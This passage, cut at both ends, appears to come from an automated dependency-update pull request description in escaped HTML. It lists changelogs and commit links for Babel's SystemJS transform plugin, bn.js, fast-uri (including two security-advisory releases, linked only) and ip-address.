href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.5 (2026-05-05)\u003c/h2\u003e\n\u003ch4\u003e:house:  Internal\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate \u003ccode\u003e@babel/*\u003c/code\u003e dependencies\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.4 (2026-05-05)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-modules-systemjs\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17974\"\u003e#17974\u003c/a\u003e [7.x backport]fix(systemjs): improve module string name support (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 1\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.3 (2026-04-30)\u003c/h2\u003e\n\u003ch4\u003e:eyeglasses: Spec Compliance\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17923\"\u003e#17923\u003c/a\u003e Support flow extends bound (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-helper-create-class-features-plugin\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-decorators\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17931\"\u003e#17931\u003c/a\u003e fix(decorators): replace super within all removed static elements (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-register\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17915\"\u003e#17915\u003c/a\u003e Fix thread synchronization issues in \u003ccode\u003e@babel/register\u003c/code\u003e (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-compat-data\u003c/code\u003e, \u003ccode\u003ebabel-plugin-bugfix-safari-rest-destructuring-rhs-array\u003c/code\u003e, \u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17788\"\u003e#17788\u003c/a\u003e Add bugfix plugin for Safari array rest destructuring bug (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:nail_care: Polish\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/4fba7541180bf5f58256d8e358b544e3831ad090\"\u003e\u003ccode\u003e4fba754\u003c/code\u003e\u003c/a\u003e v7.29.7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/a458f66074b97d54773db8159af673d23b26079b\"\u003e\u003ccode\u003ea458f66\u003c/code\u003e\u003c/a\u003e v7.29.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/32ebd5aaf2526ddd176fd6a3d1e3dc594abdc8d9\"\u003e\u003ccode\u003e32ebd5a\u003c/code\u003e\u003c/a\u003e [7.x backport]fix(systemjs): improve module string name support (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17974\"\u003e#17974\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/aa8394e454337d118ac3d40bfa3ee1a3cb3f3ed2\"\u003e\u003ccode\u003eaa8394e\u003c/code\u003e\u003c/a\u003e v7.29.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/0053db620c05acf0036f593b5aaf4e372daa79d0\"\u003e\u003ccode\u003e0053db6\u003c/code\u003e\u003c/a\u003e Update polyfill packages (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17727\"\u003e#17727\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/61647ae2397c82c3c71f077b5ab109106a5cac0f\"\u003e\u003ccode\u003e61647ae\u003c/code\u003e\u003c/a\u003e v7.28.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/a177d551adba99773f4ff00ea9bf46550def6132\"\u003e\u003ccode\u003ea177d55\u003c/code\u003e\u003c/a\u003e [Babel 8] Use \u003ccode\u003et.traverseFast\u003c/code\u003e to replace some \u003ccode\u003epath.traverse\u003c/code\u003e (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17518\"\u003e#17518\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/eebd3a06021c13d335b5b0bd79734df3abbea678\"\u003e\u003ccode\u003eeebd3a0\u003c/code\u003e\u003c/a\u003e v7.27.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/317e332e650bc04907bc787ab79f930288a3e71e\"\u003e\u003ccode\u003e317e332\u003c/code\u003e\u003c/a\u003e Enforce node protocol import (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17207\"\u003e#17207\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/fdc0fb59e119ee0b38bced63867a344a5b4bc2f3\"\u003e\u003ccode\u003efdc0fb5\u003c/code\u003e\u003c/a\u003e [Babel 8] Bump nodejs requirements to \u003ccode\u003e^20.19.0 || \u0026gt;= 22.12.0\u003c/code\u003e (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17204\"\u003e#17204\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/babel/babel/commits/v7.29.7/packages/babel-plugin-transform-modules-systemjs\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for \u003ccode\u003e@​babel/plugin-transform-modules-systemjs\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `bn.js` from 4.12.0 to 4.12.3\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/39fe4389c773327ed15f29f77f8b7dbbff4beb4c\"\u003e\u003ccode\u003e39fe438\u003c/code\u003e\u003c/a\u003e 4.12.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/67ecb35dabaf252001b649c12d69c4b57deac6f6\"\u003e\u003ccode\u003e67ecb35\u003c/code\u003e\u003c/a\u003e backport(4.x): fix imaskn state (\u003ca href=\"https://redirect.github.com/indutny/bn.js/issues/317\"\u003e#317\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/c4098bac2470418f8e0f6bf11fe0cb676a2b9047\"\u003e\u003ccode\u003ec4098ba\u003c/code\u003e\u003c/a\u003e 4.12.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/6277fd705e51edae1c404c65f03ba2e512706945\"\u003e\u003ccode\u003e6277fd7\u003c/code\u003e\u003c/a\u003e backport(4.x): Fix imuln/muln with zero (backport of \u003ca href=\"https://redirect.github.com/indutny/bn.js/issues/313\"\u003e#313\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/indutny/bn.js/issues/314\"\u003e#314\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/ac0d4afaae91701815b9edc19789e44e7690d688\"\u003e\u003ccode\u003eac0d4af\u003c/code\u003e\u003c/a\u003e 4.12.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/a5f14b43ec61bc7cafc6de2e7444913b9f581b00\"\u003e\u003ccode\u003ea5f14b4\u003c/code\u003e\u003c/a\u003e Fix serious issue in \u003ccode\u003e.toString(16)\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/indutny/bn.js/issues/309\"\u003e#309\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/indutny/bn.js/commit/0cd2661b9d08512263c940662586042ef8aaccc6\"\u003e\u003ccode\u003e0cd2661\u003c/code\u003e\u003c/a\u003e Remove package-lock.json added by npm\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/indutny/bn.js/compare/v4.12.0...v4.12.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `fast-uri` from 3.0.6 to 3.1.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/fastify/fast-uri/releases\"\u003efast-uri's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.1.2\u003c/h2\u003e\n\u003ch2\u003e⚠️ Security Release\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/fastify/fast-uri/security/advisories/GHSA-v39h-62p7-jpjc\"\u003ehttps://github.com/fastify/fast-uri/security/advisories/GHSA-v39h-62p7-jpjc\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eHandle malformed fragment decoding as a parse error by \u003ca href=\"https://github.com/mcollina\"\u003e\u003ccode\u003e@​mcollina\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/171\"\u003efastify/fast-uri#171\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/fastify/fast-uri/compare/v3.1.1...v3.1.2\"\u003ehttps://github.com/fastify/fast-uri/compare/v3.1.1...v3.1.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev3.1.1\u003c/h2\u003e\n\u003ch2\u003e⚠️ Security Release\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/fastify/fast-uri/security/advisories/GHSA-q3j6-qgpj-74h6\"\u003ehttps://github.com/fastify/fast-uri/security/advisories/GHSA-q3j6-qgpj-74h6\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ebuild(deps-dev): bump tsd from 0.32.0 to 0.33.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/148\"\u003efastify/fast-uri#148\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/checkout from 4 to 5 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/149\"\u003efastify/fast-uri#149\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(.npmrc): ignore scripts by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/150\"\u003efastify/fast-uri#150\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): remove \u003ccode\u003e@​fastify/pre-commit\u003c/code\u003e by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/151\"\u003efastify/fast-uri#151\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/setup-node from 4 to 5 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/152\"\u003efastify/fast-uri#152\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci(ci): add concurrency config by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/153\"\u003efastify/fast-uri#153\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/setup-node from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/154\"\u003efastify/fast-uri#154\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/checkout from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/156\"\u003efastify/fast-uri#156\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(license): standardise license notice by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/159\"\u003efastify/fast-uri#159\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003estyle: remove trailing whitespace by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/161\"\u003efastify/fast-uri#161\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: remove unused github files by \u003ca href=\"https://github.com/Tony133\"\u003e\u003ccode\u003e@​Tony133\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/162\"\u003efastify/fast-uri#162\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: update readme by \u003ca href=\"https://github.com/Tony133\"\u003e\u003ccode\u003e@​Tony133\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/164\"\u003efastify/fast-uri#164\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump fastify/workflows/.github/workflows/plugins-ci-package-manager.yml from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/165\"\u003efastify/fast-uri#165\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump fastify/workflows/.github/workflows/plugins-ci.yml from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/166\"\u003efastify/fast-uri#166\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump neostandard from 0.12.2 to 0.13.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/167\"\u003efastify/fast-uri#167\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: add lock-threads workflow by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/169\"\u003efastify/fast-uri#169\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Tony133\"\u003e\u003ccode\u003e@​Tony133\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/162\"\u003efastify/fast-uri#162\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/fastify/fast-uri/compare/v3.1.0...v3.1.1\"\u003ehttps://github.com/fastify/fast-uri/compare/v3.1.0...v3.1.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev3.1.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eci: remove master branch support by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/126\"\u003efastify/fast-uri#126\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(test) remove .gitkeep by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/128\"\u003efastify/fast-uri#128\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci(ci): set job permissions by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/129\"\u003efastify/fast-uri#129\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: set permissions at workflow level by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/131\"\u003efastify/fast-uri#131\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: set workflow permissions to read-only by default by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/132\"\u003efastify/fast-uri#132\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci(ci): restore job level permissions by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/133\"\u003efastify/fast-uri#133\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump tsd from 0.31.2 to 0.32.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/134\"\u003efastify/fast-uri#134\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci(ci): pin actions to commit-hash by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/135\"\u003efastify/fast-uri#135\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: add node 24 to test matrix by \u003ca href=\"https://github.com/Fdawgs\"\u003e\u003ccode\u003e@​Fdawgs\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fastify/fast-uri/pull/136\"\u003efastify/fast-uri#136\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/919dd8ea7689fcc220d0d9b71307f5095e723ef9\"\u003e\u003ccode\u003e919dd8e\u003c/code\u003e\u003c/a\u003e Bumped v3.1.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/c65ba573714af6b8e19e481d9444c27bc4355d07\"\u003e\u003ccode\u003ec65ba57\u003c/code\u003e\u003c/a\u003e fixup: linting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/6c86c17c3d76fb93aa3700ec6c0fa00faeb97293\"\u003e\u003ccode\u003e6c86c17\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/a95158ad308df4d92bbde4eba699ce5165e9f796\"\u003e\u003ccode\u003ea95158a\u003c/code\u003e\u003c/a\u003e Handle malformed fragment decoding without throwing (\u003ca href=\"https://redirect.github.com/fastify/fast-uri/issues/171\"\u003e#171\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/cea547c91c6aae610041b17b75792ca4aa035a6d\"\u003e\u003ccode\u003ecea547c\u003c/code\u003e\u003c/a\u003e Bumped v3.1.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/876ce79b662c3e5015e4e7dffe6f37752ad34f35\"\u003e\u003ccode\u003e876ce79\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/dcdf690b71a7bb3a19887ada65a9ab160d83bcc0\"\u003e\u003ccode\u003edcdf690\u003c/code\u003e\u003c/a\u003e ci: add lock-threads workflow (\u003ca href=\"https://redirect.github.com/fastify/fast-uri/issues/169\"\u003e#169\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/c860e6589b1ac346f66e114b4eadb9613768108c\"\u003e\u003ccode\u003ec860e65\u003c/code\u003e\u003c/a\u003e build(deps-dev): bump neostandard from 0.12.2 to 0.13.0 (\u003ca href=\"https://redirect.github.com/fastify/fast-uri/issues/167\"\u003e#167\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/9b4c6dc82fde0ca44e674403ece9185d85bb6d5f\"\u003e\u003ccode\u003e9b4c6dc\u003c/code\u003e\u003c/a\u003e build(deps): bump fastify/workflows/.github/workflows/plugins-ci.yml (\u003ca href=\"https://redirect.github.com/fastify/fast-uri/issues/166\"\u003e#166\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/85d09a9f7aa76b32c2bb005a90a71e144c361d24\"\u003e\u003ccode\u003e85d09a9\u003c/code\u003e\u003c/a\u003e build(deps): bump fastify/workflows/.github/workflows/plugins-ci-package-mana...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/fastify/fast-uri/compare/v3.0.6...v3.1.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ip-address` from 10.0.1 to 10.2.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/beaugunderson/ip-address/commit/80fccaae984618f35dc941efab55cf2440ab37e8\"\u003e\u003ccode\u003e80fccaa\u003c/code\u003e\u003c/a\u003e 10.2.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/beaugunderson/ip-address/commit/abaeb4d817cab16d3a1a78abd249d1f116bd302e\"\u003e\u003ccode\u003eabaeb4d\u003c/code\u003e\u003c/a\u003e Type Address4.addressMinusSuffix as non-nilable (closes \u003ca href=\"https://redirect.github.com/beaugunderson/ip-address/issues/143\"\u003e#143\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/beaugunderson/ip-address/commit/2878c294e1216f9a0b69ad1d3c57a3790a7d5e8e\"\u003e\u003ccode\u003e2878c29\u003c/code\u003e\u003c/a\u003e Preserve subnet prefix through Address6.to4() (closes \u003ca href=\"https://redirect.github.com/beaugunderson/ip-address/issues/123\"\u003e#123\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/beaugunderson/ip-address/issues/203\"\u003e#203\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/beaugunderson/ip-address/commit/586666ee9e666464071761d7a453715f98b6caee\"\u003e\u003ccode\u003e586666e\u003c/code\u003e\u003c/a\u003e Reject trailing junk in Address6.fromURL (closes \u003ca href=\"https://redirect.github.com/beaugunderson/ip-address/issues/158\"\u003e#158\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/beaugunderson/ip-address/issues/202\"\u003e#202\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/beaugunderson/ip-address/commit/80bc76eddf63df38db60defd5004bea919adf7ac\"\u003e\u003ccode\u003e80bc76e\u003c/code\u003e\u003c/a\u003e Validate static factories instead of silently overflowing (\u003ca href=\"https://redirect.github.com/beaugunderson/ip-address/issues/201\"\u003e#201\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/beaugunderson/ip-address/commit/98927be9ef0c09f8ffcaf30b297405c9eff0a520\"\u003e\u003ccode\u003e98927be\u003c/code\u003e\u003c/a\u003e Clarify isValid() accepts CIDRs with host bits set (\u003ca href=\"https://redirect.github.com/beaugunderson/ip-address/issues/81\"\u003e#81\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/beaugunderson/ip-address/commit/a0eb0732d6ac3088daa1106f4933eade41fd364a\"\u003e\u003ccode\u003ea0eb073\u003c/code\u003e\u003c/a\u003e Fix getScope() and broaden getType() classification (closes \u003ca href=\"https://redirect.github.com/beaugunderson/ip-address/issues/122\"\u003e#122\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/beaugunderson/ip-address/issues/200\"\u003e#200\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/beaugunderson/ip-address/commit/ec52105c87179129b9f091e97581e87b007824c7\"\u003e\u003ccode\u003eec52105\u003c/code\u003e\u003c/a\u003e Add networkForm() for CIDR network-address strings (\u003ca href=\"https://redirect.github.com/beaugunderson/ip-address/issues/199\"\u003e#199\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/beaugunderson/ip-address/commit/a9443a72215b21a1e692be75cd3e18e8aa2262cb\"\u003e\u003ccode\u003ea9443a7\u003c/code\u003e\u003c/a\u003e Add isMapped4() predicate for IPv4-mapped IPv6 addresses (closes \u003ca href=\"https://redirect.github.com/beaugunderson/ip-address/issues/62\"\u003e#62\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/beaugunderson/ip-address/issues/198\"\u003e#198\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca 